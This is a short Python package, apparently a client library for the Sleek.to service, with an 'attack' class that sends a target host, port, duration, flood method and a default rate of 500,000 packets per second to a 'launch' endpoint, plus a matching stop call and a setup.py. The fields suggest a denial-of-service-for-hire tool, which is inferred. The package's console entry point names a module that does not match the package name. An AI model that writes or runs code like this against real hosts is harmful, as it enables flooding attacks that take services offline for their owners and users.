import requests
import json

class stop:
	def __init__(self, token, test_id):
		self.token = token
		self.test_id = test_id
	
	def attack(self):
		payload = { 'test_id' : self.test_id }
		r = requests.post('https://api.sleek.to/tests/stop?token=' + str(self.token), data=payload)
		return r



import requests
import json

class attack:
	def __init__(self, token, host, port, time, method, pps="500000"):
		self.token = token
		self.host = host
		self.port = port
		self.time = time
		self.method = method
		self.pps = pps

	def send(self):
		payload = { 'target' : self.host, 'port' : self.port, 'duration' : self.time, 'method' : self.method, 'pps' : self.pps }
		r = requests.post('https://api.sleek.to/tests/launch?token=' + str(self.token), data=payload)
		return r



import pathlib
from setuptools import setup

HERE = pathlib.Path(__file__).parent


README = (HERE / "README.md").read_text()

setup(
    name="sleekAPI",
    version="1.0.0",
    description="A simple API wrapper for Sleek.to, see GitHub for usage",
    long_description=README,
    long_description_content_type="text/markdown",
    url="https://github.com/TheRealAkai",
    author="Akai",
    author_email="akai@airmail.cc",
    packages=["sleekAPI"],
    include_package_data=True,
    install_requires=["requests"],
    entry_points={
        "console_scripts": [
            "sleek=sleek.__init__:main",
        ]
    },
)